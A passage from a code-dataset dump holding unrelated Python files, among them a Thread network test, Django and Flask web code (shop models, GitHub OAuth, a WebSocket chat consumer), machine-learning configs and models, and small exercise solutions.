IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n\nimport unittest\n\nimport config\nimport thread_cert\n\nLEADER = 1\nROUTER = 2\nMED = 3\nSED = 4\n\n\nclass TestDatasetUpdater(thread_cert.TestCase):\n SUPPORT_NCP = False\n USE_MESSAGE_FACTORY = False\n\n TOPOLOGY = {\n LEADER: {\n 'mode': 'rdn',\n 'channel': 11,\n },\n ROUTER: {\n 'mode': 'rdn',\n 'channel': 11,\n },\n MED: {\n 'mode': 'rn',\n 'channel': 11,\n 'allowlist': [ROUTER],\n },\n SED: {\n 'mode': '-',\n 'channel': 11,\n 'timeout': config.DEFAULT_CHILD_TIMEOUT,\n 'allowlist': [ROUTER],\n },\n }\n\n def test(self):\n self.nodes[LEADER].start()\n self.simulator.go(config.LEADER_STARTUP_DELAY)\n self.assertEqual(self.nodes[LEADER].get_state(), 'leader')\n\n self.nodes[ROUTER].start()\n self.simulator.go(config.ROUTER_STARTUP_DELAY)\n self.assertEqual(self.nodes[ROUTER].get_state(), 'router')\n\n self.nodes[MED].start()\n self.simulator.go(5)\n self.assertEqual(self.nodes[MED].get_state(), 'child')\n\n self.nodes[SED].start()\n self.simulator.go(5)\n self.assertEqual(self.nodes[SED].get_state(), 'child')\n\n self.verify_state(11)\n\n # update initiated by LEADER\n self.nodes[LEADER].start_dataset_updater(channel=12)\n self.simulator.go(120)\n self.verify_state(12)\n\n # update initiated by ROUTER\n self.nodes[ROUTER].start_dataset_updater(channel=13)\n self.simulator.go(120)\n self.verify_state(13)\n\n # update initiated by LEADER overridden by ROUTER\n self.nodes[LEADER].start_dataset_updater(channel=14)\n self.simulator.go(20)\n self.nodes[ROUTER].start_dataset_updater(channel=15)\n self.simulator.go(120)\n self.verify_state(15)\n\n # update initiated by ROUTER overridden by LEADER\n self.nodes[ROUTER].start_dataset_updater(channel=16)\n self.simulator.go(10)\n self.nodes[LEADER].start_dataset_updater(channel=17)\n self.simulator.go(120)\n self.verify_state(17)\n\n def verify_state(self, channel):\n self.assertEqual(self.nodes[LEADER].get_channel(), channel)\n self.assertEqual(self.nodes[ROUTER].get_channel(), channel)\n self.assertEqual(self.nodes[MED].get_channel(), channel)\n self.assertEqual(self.nodes[SED].get_channel(), channel)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/scripts/thread-cert/test_dataset_updater.py","file_name":"test_dataset_updater.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"351414849","text":"import math\n\nfrom autoslug import AutoSlugField\nfrom ckeditor.fields import RichTextField\nfrom django.contrib.auth.models import User\nfrom django.db import models\n\n# Create your models here.\nfrom django.db.models import Avg\nfrom sorl.thumbnail import ImageField\n\n\nclass Category(models.Model):\n title = models.CharField(max_length=255)\n details = RichTextField()\n slug = AutoSlugField(populate_from='title', unique=True)\n\n class Meta:\n verbose_name_plural = 'Categories'\n\n def __str__(self):\n return self.title\n\n\nclass Product(models.Model):\n title = models.CharField(max_length=255)\n category = models.ForeignKey(Category, on_delete=models.CASCADE)\n slug = AutoSlugField(populate_from='title', unique=True)\n price = models.IntegerField()\n discount = models.IntegerField()\n availability = models.BooleanField()\n brand = models.CharField(max_length=50)\n size = models.CharField(max_length=255)\n colors = models.CharField(max_length=255)\n short_intro = RichTextField()\n details = RichTextField()\n pubdate = models.DateTimeField(auto_now_add=True)\n deals_of_the_day = models.BooleanField()\n is_new = models.BooleanField()\n\n def image(self):\n return self.producthasimage_set.first().image\n\n def size_list(self):\n if not self.size:\n return []\n return self.size.split(',')\n\n def __str__(self):\n return self.title\n\n def rating(self):\n op = self.producthasimage_set.aggregate(Avg('rating'))\n r = 0\n if 'rating__avg' in op and op['rating_avg']:\n r = op['rating_avg']\n\n return int(math.ceil(r))\n\n def rating_range(self):\n return range(self.rating())\n\n\nclass ProductHasImage(models.Model):\n image = ImageField()\n caption = models.TextField()\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n\n\nclass ProductHasReview(models.Model):\n user = models.ForeignKey(User, on_delete=models.DO_NOTHING)\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n rating = models.IntegerField()\n comment = models.TextField()\n pubdate = models.DateTimeField(auto_now_add=True)\n\n def rating_range(self):\n if not self.rating:\n return []\n\n return range(self.rating)\n","sub_path":"Onlinebazzar/shop/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"532354072","text":"import json\nimport os\nfrom flask import redirect, request, session\nfrom flask_restplus import Namespace, Resource\nfrom requests_oauthlib import OAuth2Session\nfrom security.token import get_jwt_token, TokenType, get_token_redirect_response\n\n# pylint: disable=unused-variable\n\n# OAuth endpoints given in the GitHub API documentation\nAUTHORIZATION_URI = 'https://github.com/login/oauth/authorize'\nTOKEN_URI = 'https://github.com/login/oauth/access_token'\nUSER_PROFILE_URI = 'https://api.github.com/user'\nUSER_EMAIL_URI = 'https://api.github.com/user/emails'\nSCOPE = ['user:email']\n\n# OAuth application configuration created on Github\nclient_id = os.environ['GITHUB_CLIENT_ID']\nclient_secret = os.environ['GITHUB_CLIENT_SECRET']\nredirect_uri = os.environ['HOST_NAME'] + '/mobydq/api/v1/security/oauth/github/callback'\n\n\ndef get_user_info(github_session: object):\n \"\"\"Gets user profile using OAuth session.\"\"\"\n\n user_profile = github_session.get(USER_PROFILE_URI).content.decode('utf-8')\n user_profile = json.loads(user_profile)\n\n if user_profile['email'] is None:\n emails = github_session.get(USER_EMAIL_URI).content.decode('utf-8')\n emails = json.loads(emails)\n user_profile['email'] = emails[0]['email']\n\n return user_profile\n\n\ndef register_github_oauth(namespace: Namespace):\n \"\"\"Registers all endpoints used for Github OAuth authentication.\"\"\"\n\n @namespace.route('/security/oauth/github')\n @namespace.doc()\n class GithubOAuth(Resource):\n \"\"\"Defines resource to redirect user to Github OAuth page.\"\"\"\n\n def get(self):\n \"\"\"Redirects user to Github OAuth page.\"\"\"\n\n github_session = OAuth2Session(client_id, redirect_uri=redirect_uri, scope=SCOPE)\n url, state = github_session.authorization_url(AUTHORIZATION_URI)\n\n # State is used to prevent CSRF, keep this for later.\n session['oauth_state'] = state\n return redirect(url)\n\n @namespace.route('/security/oauth/github/callback')\n @namespace.doc()\n class GithubOAuthCallback(Resource):\n \"\"\"Defines resource to handle callback from Github OAuth.\"\"\"\n\n def get(self):\n \"\"\"Handles Github OAuth callback and fetch user access token.\"\"\"\n\n github_session = OAuth2Session(client_id, state=session['oauth_state'])\n token = github_session.fetch_token(TOKEN_URI, client_secret=client_secret, authorization_response=request.url)\n\n user_info = get_user_info(github_session)\n jwt = get_jwt_token(TokenType.GITHUB, user_info['email'], user_info, token)\n return get_token_redirect_response(jwt)\n","sub_path":"api/init/security/oauth/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"149806448","text":"import os\nimport tensorflow as tf\n\nfrom badgr.file_manager import FileManager\nfrom badgr.datasets.tfrecord_rebalance_dataset import TfrecordRebalanceDataset\nfrom badgr.jackal.envs.jackal_env_specs import JackalPositionCollisionEnvSpec\nfrom badgr.jackal.models.jackal_position_model import JackalPositionModel\nfrom badgr.utils.python_utils import AttrDict as d\n\n\n\n###############\n### Dataset ###\n###############\n\ndef get_dataset_params(env_spec, horizon, batch_size):\n all_tfrecord_folders = [\n os.path.join(FileManager.data_dir, 'tfrecords_collision/{0}-2019_horizon_{1}'.format(f, horizon)) for f in\n ['08-02', '08-06', '08-08', '08-13', '08-15', '08-18', '08-20', '08-27', '08-29', '09-09', '09-12', '09-17',\n '09-19', '10-20', '10-24', '10-31']\n ]\n train_tfrecord_folders = [fname for fname in all_tfrecord_folders if '09-12' not in fname],\n holdout_tfrecord_folders = [fname for fname in all_tfrecord_folders if '09-12' in fname],\n\n kwargs_train = d(\n rebalance_key='outputs/collision/close',\n\n env_spec=env_spec,\n tfrecord_folders=train_tfrecord_folders,\n\n horizon=horizon,\n batch_size=batch_size,\n\n num_parallel_calls=6,\n shuffle_buffer_size=1000,\n prefetch_buffer_size_multiplier=10,\n )\n\n kwargs_holdout = kwargs_train.copy()\n kwargs_holdout.tfrecord_folders = holdout_tfrecord_folders\n\n return d(\n cls=TfrecordRebalanceDataset,\n kwargs_train=kwargs_train,\n kwargs_holdout=kwargs_holdout\n\n )\n\n\n#############\n### Model ###\n#############\n\ndef get_model_params(env_spec, horizon):\n kwargs_train = d(\n # jackal mode\n use_both_images=False,\n\n # RNN\n horizon=horizon,\n rnn_dim=64,\n\n # inputs/outputs\n env_spec=env_spec,\n output_observations=[\n d(\n name='jackal/position',\n is_relative=True\n ),\n d(\n name='collision/close',\n is_relative=False\n )\n ],\n\n is_output_gps=False,\n )\n\n kwargs_eval = kwargs_train.copy()\n kwargs_eval.is_output_gps = True\n\n return d(\n cls=JackalPositionModel,\n kwargs_train=kwargs_train,\n kwargs_eval=kwargs_eval\n )\n\n\n################\n### Training ###\n################\n\ndef get_trainer_params():\n\n def cost_fn(model_outputs, outputs):\n batch_size = tf.shape(outputs.done)[0]\n batch_size_float = tf.cast(batch_size, tf.float32)\n\n done = tf.concat([tf.zeros([batch_size, 1], dtype=tf.bool), outputs.done[:, :-1]], axis=1)\n mask = tf.cast(tf.logical_not(done), tf.float32)\n tf.debugging.assert_positive(tf.reduce_sum(mask, axis=1))\n mask = batch_size_float * (mask / tf.reduce_sum(mask))\n mask = mask[..., tf.newaxis]\n\n ### position\n\n cost_position = tf.reduce_sum(\n mask * 0.5 * tf.square(model_outputs.jackal.position - outputs.jackal.position),\n axis=(1, 2)\n )\n\n ### collision\n\n model_output_collision = model_outputs.collision.close[..., 0]\n\n collision = tf.cast(outputs.collision.close, tf.bool)[..., 0]\n collision = tf.logical_and(collision, tf.logical_not(done)) # don't count collisions after done!\n collision = tf.cumsum(tf.cast(collision, tf.float32), axis=-1) > 0.5\n\n # collision mask should be same as normal mask, but turned on for dones with collision = true\n mask_collision = tf.cast(tf.logical_or(tf.logical_not(done), collision), tf.float32)\n mask_collision = batch_size_float * (mask_collision / tf.reduce_sum(mask_collision))\n\n cost_collision = 2.0 * tf.reduce_sum(\n mask_collision * tf.nn.sigmoid_cross_entropy_with_logits(labels=tf.cast(collision, tf.float32),\n logits=model_output_collision),\n axis=1\n )\n collision_accuracy = tf.reduce_mean(tf.cast(tf.equal(model_output_collision > 0,\n tf.cast(collision, tf.bool)),\n tf.float32),\n axis=1)\n collision_accuracy_random = tf.reduce_mean(1. - tf.cast(collision, tf.float32), axis=1)\n\n ### regularization\n\n cost_l2_reg = 1e-2 * \\\n tf.reduce_mean([0.5 * tf.reduce_mean(kernel * kernel) for kernel in model_outputs.kernels]) * \\\n tf.ones(batch_size)\n\n ### filter out nans\n\n costs_is_finite = tf.logical_and(tf.is_finite(cost_position), tf.is_finite(cost_collision))\n cost_position = tf.boolean_mask(cost_position, costs_is_finite)\n cost_collision = tf.boolean_mask(cost_collision, costs_is_finite)\n cost_l2_reg = tf.boolean_mask(cost_l2_reg, costs_is_finite)\n # assert cost_l2_reg.shape[0].value > 0.5 * batch_size\n\n ### total\n\n cost = cost_position + cost_collision + cost_l2_reg\n\n return d(\n total=cost,\n position=cost_position,\n collision=cost_collision,\n collision_accuracy=collision_accuracy,\n collision_accuracy_random=collision_accuracy_random,\n l2_reg=cost_l2_reg\n )\n\n\n return d(\n # steps\n max_steps=2e5,\n holdout_every_n_steps=50,\n log_every_n_steps=1e3,\n save_every_n_steps=1e4,\n\n # dataset\n batch_size=32,\n\n # optimizer\n cost_fn=cost_fn,\n optimizer_cls=tf.compat.v1.train.AdamOptimizer,\n learning_rate=1e-4,\n )\n\n##################\n### Get params ###\n##################\n\ndef get_params():\n horizon = 8\n\n env_spec = JackalPositionCollisionEnvSpec(left_image_only=True)\n\n model_params = get_model_params(env_spec, horizon)\n trainer_params = get_trainer_params()\n dataset_params = get_dataset_params(env_spec, horizon, trainer_params.batch_size)\n\n return d(\n exp_name='collision_position',\n\n dataset=dataset_params,\n model=model_params,\n trainer=trainer_params,\n )\n\nparams = get_params()\n","sub_path":"badgr/data/configs/collision_position.py","file_name":"collision_position.py","file_ext":"py","file_size_in_byte":6250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"404993572","text":"from asgiref.sync import async_to_sync\nimport json\nfrom channels.generic.websocket import WebsocketConsumer\nfrom .models import Message\nfrom restltform.models import follow\nfrom django.contrib.auth import get_user_model\nfrom django.shortcuts import render,redirect,get_object_or_404\nUser=get_user_model()\nclass ChatConsumer(WebsocketConsumer):\n def fetch_messages(self,data):\n #print(\"fetching\",data)\n reciver=data['to'].replace(data['from'],\"\")\n from_user=get_object_or_404(User,username=data['from'])\n reciver_user=get_object_or_404(User,username=reciver)\n messages=Message.get_messages(from_user=from_user,to_user=reciver_user)\n #messages=Message.last_10_messages(Message)\n content={\n 'command':'messages',\n 'messages':self.messages_to_json(messages)\n }\n self.send_message(content)\n def new_message(self,data):\n #print(\"new\")\n author=data['from']\n reciver=data['to'].replace(author,\"\")\n reciver_obj=get_object_or_404(User,username=reciver)\n author_user=User.objects.filter(username=author)[0]\n message=Message.objects.create(author=author_user,content=data['message'],reciver=reciver_obj)\n content={\n 'command':'new_message',\n 'message':{'author':message.author.username,'content':message.content,'timestamp':str(message.timestamp)}\n }\n\n return self.send_chat_message(content)\n def messages_to_json(self,messages):\n result=[]\n for msg in messages:\n result.append({'author':msg.author.username,'content':msg.content,'timestamp':str(msg.timestamp)})\n return result\n commands={\n \"fetch_messages\":fetch_messages,\n \"new_message\":new_message\n }\n def connect(self):\n self.room_name = self.scope['url_route']['kwargs']['room_name']\n self.room_group_name = 'chat_%s' % self.room_name\n user=self.scope['user']\n #print(user.profile_user.status)\n _user=get_object_or_404(follow,user=user)\n _user.status=True\n _user.save()\n # Join room group\n async_to_sync(self.channel_layer.group_add)(\n self.room_group_name,\n self.channel_name\n )\n\n self.accept()\n\n def disconnect(self, close_code):\n # Leave room group\n user=self.scope['user']\n _user=get_object_or_404(follow,user=user)\n _user.status=False\n _user.save()\n async_to_sync(self.channel_layer.group_discard)(\n self.room_group_name,\n self.channel_name\n )\n\n # Receive message from WebSocket\n def receive(self, text_data):\n data= json.loads(text_data)\n #print(data)\n self.commands[data['command']](self,data)\n # Send message to room group\n def send_chat_message(self,message):\n async_to_sync(self.channel_layer.group_send)(\n self.room_group_name,\n {\n 'type': 'chat_message',\n 'message': message\n }\n )\n def send_message(self,message):\n self.send(text_data=json.dumps(message))\n # Receive message from room group\n def chat_message(self, event):\n message = event['message']\n\n # Send message to WebSocket\n self.send(text_data=json.dumps(message))","sub_path":"chat/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"247548223","text":"# -*- coding: utf-8 -*-\n# Copyright 2016 Onestein ()\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\n\nfrom openerp import fields, models, api, _\n\n\nclass SaleOrderConfirmWizard(models.TransientModel):\n _name = \"sale.order.confirm.wizard\"\n _description = \"Wizard - Sale Order Confirm\"\n\n @api.multi\n def confirm_sale_orders(self):\n self.ensure_one()\n active_ids = self._context.get('active_ids')\n orders = self.env['sale.order'].browse(active_ids)\n for order in orders:\n order.action_confirm()\n","sub_path":"wizard/sale_order_confirm.py","file_name":"sale_order_confirm.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"281895845","text":"import sys\n\nn, y = map(int, input().split())\nfor i in range(n+1):\n for j in range(n-i+1):\n k = n - i - j\n money = 10000 * i + 5000 * j + 1000 * k\n if y == money:\n print(\"{} {} {}\".format(i, j, k))\n sys.exit()\nprint(-1, -1, -1)","sub_path":"python/Web+DB_PressVol115/C_Otoshidama.py","file_name":"C_Otoshidama.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"321951691","text":"import numpy as np\nfrom scipy.misc import imread, imresize\nfrom scipy.io import loadmat\nimport pandas as pd\nimport os\nimport cv2\nimport matplotlib.pyplot as plt\nfrom keras.preprocessing import image\n\n\ndef get_labels(dataset):\n return {0: 'angry', 1: 'disgust', 2: 'fear', 3: 'happy', 4: 'sad', 5: 'surprise', 6: 'neutral'}\n\ndef load_data(self):\n image_size = (48, 48)\n data = pd.read_csv('datasets/fer2013.csv')\n pixels = data['pixels'].tolist()\n width, height = 48, 48\n faces = []\n for pixel_sequence in pixels:\n face = [int(pixel) for pixel in pixel_sequence.split(' ')]\n face = np.asarray(face).reshape(width, height)\n face = cv2.resize(face.astype('uint8'), self.image_size)\n faces.append(face.astype('float32'))\n faces = np.asarray(faces)\n faces = np.expand_dims(faces, -1)\n emotions = pd.get_dummies(data['emotion']).as_matrix()\n return faces, emotions\n\n\n\n\n\ndef detect_faces(detection_model, gray_image_array):\n return detection_model.detectMultiScale(gray_image_array, 1.3, 5)\n\n\ndef draw_text(coordinates, image_array, text, color, x_offset=0, y_offset=0, font_scale=2, thickness=2):\n x, y = coordinates[:2]\n cv2.putText(image_array, text, (x + x_offset, y + y_offset),\n cv2.FONT_HERSHEY_SIMPLEX,\n font_scale, color, thickness, cv2.LINE_AA)\n\n\ndef draw_bounding_box(face_coordinates, image_array, color):\n x, y, w, h = face_coordinates\n cv2.rectangle(image_array, (x, y), (x + w, y + h), color, 2)\n\n\ndef apply_offsets(face_coords, offsets):\n x, y, width, height = face_coords\n x_off, y_off = offsets\n return (x - x_off, x + width + x_off, y - y_off, y + height + y_off)\n\ndef load_detection_model(model_path):\n detection_model = cv2.CascadeClassifier(model_path)\n return detection_model\n\ndef preprocess_input(x, v2=True):\n x = x.astype('float32')\n x = x / 255.0\n if v2:\n x = x - 0.5\n x = x * 2.0\n return x\n\n\n# def _imread(image_name):\n# return imread(image_name)\n\n\n# def _imresize(image_array, size):\n# return imresize(image_array, size)\n\n\n# def to_categorical(integer_classes, num_classes=2):\n# integer_classes = np.asarray(integer_classes, dtype='int')\n# num_samples = integer_classes.shape[0]\n# categorical = np.zeros((num_samples, num_classes))\n# categorical[np.arange(num_samples), integer_classes] = 1\n# return categorical\n","sub_path":"stream_app/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"333088073","text":"\"\"\"\nDeep neural network for calcium imaging segmentation\nJonathan D. Kenny, July 6th 2018\nCaltech\n\nPyTorch 0.4.0\nPython 3.6\n\"\"\"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass ConvBlock(nn.Module):\n \"\"\"\n Three convolutional layers with one convolutional residual connection.\n input: (N, in_channels, h, w)\n output: (N, out_channels, h/2, w/2)\n\n Attributes:\n in_channels (int): Number of activation filters/channels for the input.\n out_channels (int): Number of activation filters for the output.\n kernel_size (tuple): Size of the receptive field (in pixels). Inherited from superclass.\n dropout (float): Probability to randomly zero a unit/filter. Inherited from superclass.\n\n Diagram:\n /---------------------------> conv -> relu -> drop ---------------------------\\\n inputs -> conv -> relu -> drop -> conv -> relu -> drop -> conv -> relu -> drop -> mp -> output\n \"\"\"\n def __init__(self, in_channels, out_channels, kernel_size, dropout):\n super().__init__()\n\n padding = ((kernel_size[0] - 1)/2, (kernel_size[1] - 1)/2)\n\n # Convolutional Layer 1\n self.conv_1 = nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, padding=padding)\n self.d_1 = nn.Dropout2d(p=dropout)\n\n # Convolutional Layer 2\n self.conv_2 = nn.Conv2d(out_channels, out_channels, kernel_size=kernel_size, padding=padding)\n self.d_2 = nn.Dropout2d(p=dropout)\n\n # Convolutional Layer 3\n self.conv_3 = nn.Conv2d(out_channels, out_channels, kernel_size=kernel_size, padding=padding)\n self.d_3 = nn.Dropout2d(p=dropout)\n\n # Residual Layer (Skip connection)\n self.conv_4 = nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, padding=padding)\n self.d_4 = nn.Dropout2d(p=dropout)\n\n # Pooling Layer\n self.mp = nn.MaxPool2d((2, 2), stride=(2, 2))\n\n def forward(self, inputs):\n # Residual Layer (Skip connection)\n residuals = self.d_4(F.relu(self.conv_4(inputs)))\n\n # Convolutional Layer 1\n inputs = self.d_1(F.relu(self.conv_1(inputs)))\n\n # Convolutional Layer 2\n inputs = self.d_2(F.relu(self.conv_2(inputs)))\n\n # Convolutional Layer 3\n inputs = self.d_3(F.relu(self.conv_3(inputs)))\n\n # Skip connection addition\n inputs = inputs + residuals\n\n # Pooling\n inputs = self.mp(inputs)\n\n return inputs\n\n\nclass DeepCalcium(nn.Module):\n \"\"\"\n Convolutional blocks with one fully-connected hidden layer and fully-connected output layer.\n input: (N, 1, h, w)\n output: (h*w)\n\n Attributes:\n filters (list): List of activation fitlers for the convolutional blocks. The length of the list is the number\n of convolutional blocks.\n unit (int): Hidden units in the fully-connected layer.\n h (int): Height of the input image (in pixels, should be a power of 2).\n w (int): Width of the input image (in pixels, should be a power of 2).\n kernel_size (tuple): Size of the receptive field (in pixels).\n dropout (float): Probability to randomly zero a unit/filter.\n\n Diagram:\n inputs -> ...conv blocks... -> fc1 -> relu -> dropout -> fc2 -> outputs\n \"\"\"\n def __init__(self, filters, units, h, w, kernel_size=(7, 7), dropout=0.0):\n super().__init__()\n\n # Convolutional layers\n self.blocks = nn.ModuleList()\n for n, _ in enumerate(filters):\n if n is 0:\n self.blocks.append(ConvBlock(1, filters[n], kernel_size=kernel_size, dropout=dropout))\n else:\n self.blocks.append(ConvBlock(filters[n-1], filters[n], kernel_size=kernel_size, dropout=dropout))\n\n # Full-connected layers\n self.fc_1 = nn.Linear((h/(2**len(filters))) * (w/(2**len(filters))) * filters[-1], units)\n self.fc_d = nn.Dropout(p=dropout)\n\n # Output layers\n self.fc_2 = nn.Linear(units, h * w) # cell center (-1 or 1)\n self.fc_3 = nn.Linear(units, h * w) # radius (positive int)\n\n def forward(self, inputs):\n # Convolutional layers\n for _, b in enumerate(self.blocks):\n inputs = b(inputs)\n\n # Reshape and pass to hidden fully-connected layer\n inputs = inputs.view(inputs.shape[0], -1)\n inputs = self.fc_d(F.relu(self.fc_1(inputs)))\n\n # Output layers\n output_1 = F.tanh(self.fc_2(inputs)) # clamp between -1 and 1\n output_2 = F.relu(self.fc_3(inputs)) # keep positive\n\n return output_1, output_2\n\n\n# ======================================================================================================================\n# Options\n# ======================================================================================================================\nfilters = [16, 32, 48, 64]\nunits = 512\nh = 32\nw = 32\nN = 1 # batch size\nn_iterations = 100\nn_cells = 500\n\n# ======================================================================================================================\n# Model training\n# ======================================================================================================================\n# Create learning model\nmodel = DeepCalcium(filters=filters, units=units, h=h, w=w)\n\n# Synthetic images\ninputs = torch.randint(0, 256, (N, 1, h, w)) # pixels (0 to 255)\n\n# Synthetic cell (center) placements (binary: -1 or 1)\ntarget_1 = -1*torch.ones(N, h*w)\nk = torch.randperm(h*w)\ntarget_1[:, k[0:n_cells]] = 1\n\n# Synthetic cell radii (in pixels)\ntarget_2 = torch.zeros(N, h * w)\ntarget_2[:, k[0:n_cells]] = torch.randint(1, 8, (1, n_cells))\n\nif torch.cuda.is_available():\n model = model.cuda()\n inputs = inputs.cuda()\n target_1 = target_1.cuda()\n target_2 = target_2.cuda()\n\n# Create loss function and optimizer\nloss_function_1 = nn.SoftMarginLoss() # cell center (-1 or 1)\nloss_function_2 = nn.MSELoss() # radius (positive int)\noptimizer = torch.optim.Adam(model.parameters(), amsgrad=True)\n\nfor iteration in range(n_iterations):\n # Forward step\n optimizer.zero_grad()\n output_1, output_2 = model(inputs)\n\n # Calculate cross-entropy loss\n loss_1 = loss_function_1(output_1, target_1)\n loss_2 = loss_function_2(output_2, target_2)\n\n # Backward step (backpropagation of errors)\n loss_1.backward(retain_graph=True)\n loss_2.backward()\n optimizer.step()\n\n print('iteration:', iteration, 'loss 1:', loss_1.cpu().detach().numpy(), 'loss 2:', loss_2.cpu().detach().numpy())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"529370283","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 13 23:38:40 2012\n\n@author: mag\n\"\"\"\n\n#import pickle\n\nimport cPickle as pickle\n\noutput = open('data.pkl', 'wb')\n\n# Pickle dictionary using protocol 0.\npickle.dump(SigmaHHwnr, output)\n\n# Pickle the list using the highest protocol available.\npickle.dump(selfref_list, output, -1)\n\noutput.close()\n\n\nimport pickle\n\npkl_file = open('data.pkl', 'rb')\n\ndata1 = pickle.load(pkl_file)\ndata2 = pickle.load(pkl_file)\n\npkl_file.close()\n\nfrom osgeo import gdal\n\ndriver = gdal.GetDriverByName('GTiff')\noutput_dataset = driver.Create('sigma.tiff', \\\n calibPar.RasterXSize, calibPar.RasterYSize, 4, gdal.GDT_Float64)\noutput_dataset.SetGeoTransform(calibPar.geotransform)\noutput_dataset.SetGCPs(calibPar.gcps, calibPar.gcpproj)\noutput_dataset.GetRasterBand(1).WriteArray(calibPar.SigmaHHwnr, 0, 0)\noutput_dataset.GetRasterBand(2).WriteArray(calibPar.SigmaVVwnr, 0, 0)\noutput_dataset.GetRasterBand(3).WriteArray(calibPar.SigmaHVwnr, 0, 0)\noutput_dataset.GetRasterBand(4).WriteArray(calibPar.SigmaVHwnr, 0, 0)\noutput_dataset = None\n\nfid=gdal.Open('sigma.tiff',gdal.GA_ReadOnly)\nHH = fid.GetRasterBand(1).ReadAsArray()\nHV = fid.GetRasterBand(2).ReadAsArray()\nVH = fid.GetRasterBand(3).ReadAsArray()\nVV = fid.GetRasterBand(4).ReadAsArray()\nfid = None","sub_path":"drafts/pickleTest.py","file_name":"pickleTest.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"603166826","text":"import os\nimport json\n\nimport PyGnuplot as gp\n\nlabels = [('Mean Opinion Score', 'mean_opinion_score'),\n ('Frame Rate', 'frame_rate'),\n ('Consumed Profile', 'profile')]\nspectator_data = '{}/{}/transcoder_{}/spectators/{}/data/{}.txt'\n\nfor scenario_dir in next(os.walk('.'))[1]:\n for run in next(os.walk(scenario_dir))[1]:\n with open('{}/{}/{}.txt'.format(scenario_dir, run, run)) as collected_measurements:\n spectators_and_trans = dict()\n for line in collected_measurements:\n previous_measurements, action, after_measurements = json.loads(line)\n client_id = previous_measurements.pop('client_id')\n transcoder_no = previous_measurements.pop('transcoder_no')\n if (client_id, transcoder_no) in spectators_and_trans.keys():\n spectators_and_trans[(client_id, transcoder_no)]['mean_opinion_score'].extend(\n [previous_measurements['mean_opinion_score'], after_measurements['mean_opinion_score']])\n spectators_and_trans[(client_id, transcoder_no)]['frame_rate'].extend(\n [previous_measurements['framerate_on'], after_measurements['framerate_on']])\n spectators_and_trans[(client_id, transcoder_no)]['profile'].extend(\n [previous_measurements['quality'], after_measurements['quality']])\n else:\n spectators_and_trans.update({\n (client_id, transcoder_no): {\n 'mean_opinion_score': [previous_measurements['mean_opinion_score'],\n after_measurements['mean_opinion_score']],\n 'frame_rate': [previous_measurements['framerate_on'],\n after_measurements['framerate_on']],\n 'profile': [previous_measurements['quality'],\n after_measurements['quality']]\n }\n })\n for key in spectators_and_trans.keys():\n for metric in spectators_and_trans[key].keys():\n filename = spectator_data.format(scenario_dir, run, key[1], key[0], metric)\n if not os.path.exists(os.path.dirname(filename)):\n os.makedirs(os.path.dirname(filename))\n X = spectators_and_trans[key][metric]\n Y = list(range(0, len(spectators_and_trans[key][metric])))\n gp.s([Y, X], filename)\n","sub_path":"results/make_spectator_data.py","file_name":"make_spectator_data.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"404487810","text":"\"\"\"\r\nTitle : collections namedtuple.\r\nSubdomain : HackerRank/Python/Challenges/Collections\r\nDomain : Python\r\nAuthor : Sai Ram Adidela\r\nCreated : 16 May 2018\r\n\"\"\"\r\n# from __future__ import division\r\nfrom collections import namedtuple\r\nno = int(input())\r\ncolumns = ','.join(input().split())\r\n# print('intial columns: ', columns)\r\nstudent = namedtuple('student', columns)\r\nsum = 0\r\nfor i in range(no):\r\n line = input().split()\r\n stu = student(*line)\r\n # print('stu: ', stu)\r\n sum += 